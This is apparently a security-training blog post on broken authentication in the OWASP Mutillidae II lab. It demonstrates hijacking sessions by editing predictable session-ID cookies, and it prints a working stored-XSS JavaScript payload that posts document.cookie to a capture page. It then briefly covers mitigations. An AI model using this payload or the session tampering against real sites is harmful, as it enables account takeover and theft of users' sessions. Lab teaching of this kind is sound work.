A2: 2017 – Broken authentication and session management (Part 2)

Om nom nom
Do you remember this classic episode where Tom Hiddleston teaches Cookie Monster a lesson in delayed gratification? I’m with Cookie Monster on this – can’t wait, let’s get to cookies right now!

cm_4

We’ll need extensions for our browser to manage cookies and since I use Firefox I’ll use «Cookie Manager+».

Cookies!
Let’s create two accounts in our OWASP Mutillidae II database. Let’s name them Elmo and Bert. Now login with Elmo. Looks good, in the upper right corner we can see it:

a2_1

Great, it works, and now let’s look at cookies. We can see that our Session ID number is 27:

a2_2

Remember this number.

Now let’s log out and login as Bert. Check cookie manager again. Interesting, our Session ID is now 28:

a2_3.png

It seems that web application just assigns a next number for next session. Ok, here’s some magic – let’s change this Session ID number back to 27 and refresh page. Oops, we’re Elmo again. What happened? Well, web applcation identifies us by our cookie, and cookie was tampered. We can check any other number to find another sessions at some point. Imagine that anyone can get to admin session without login and password. Creepy, but take another cookie.

cm_2

Properly configured web application generates long and random session IDs so there’s no way to guess it. Well, there’s no need to guess it since we can steal cookies.

cm_3

(Yes, I just can’t get enough with Cookie Monster memes =))

Let’s see this example «A1: Injection (SQL)» > «SQLi – Insert Injection» > «Add to your blog». Let’s post a specially generated script to the page as a blog entry. Actually we’re also going to exploit stored XSS here, but we’ll learn this term much later. There is a bunch of «default» scripts for this kind of attack and we’ll use one bundled with Mutilidae at \xampp\htdocs\mutillidae\documentation\Mutillidae-Test-Scripts.txt:

 var lXMLHTTP;
 try{ 
 var lData = "data=" + encodeURIComponent(document.cookie);
 var lHost = "localhost";
 var lProtocol = "http";
 var lFilePath = "/mutillidae/capture-data.php";
 var lAction = lProtocol + "://" + lHost + lFilePath;
 var lMethod = "POST";

try {
 lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP"); 
 }catch (e) { 
 try { 
 lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"); 
 }catch (e) { 
 try { 
 lXMLHTTP = new XMLHttpRequest(); 
 }catch (e) { 
 //alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST. 
 } 
 } 
 }//end try

lXMLHTTP.onreadystatechange = function(){} 
 lXMLHTTP.open(lMethod, lAction, true);
 lXMLHTTP.setRequestHeader("Host", lHost); 
 lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 
 lXMLHTTP.send(lData);

}catch(e){ 
 }

This script takes cookies from user session and copies it to some other web page. Usually it is our web site somewhere on the Internet. OWASP Mutilidae II has a special section – «Other» > «Data capture pages» > «Data capture». This script will post its data right there.

Ok, let’s post this script as a blog entry, and then login as our old buddy Elmo. Now let’s switch to captured data page and here we are:

a2_8.png

Here’s captured cookie, and we can use it impersonate Elmo.

cm_2

What can we do about it?
Well, there are several evasion techniques. First of all, we can use server-side secure session management that generates random (really random!) session IDs. Session IDs must have appropriate idle time outs, plus user log out must be handled properly.

See you next time, we have so much interesting ahead.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s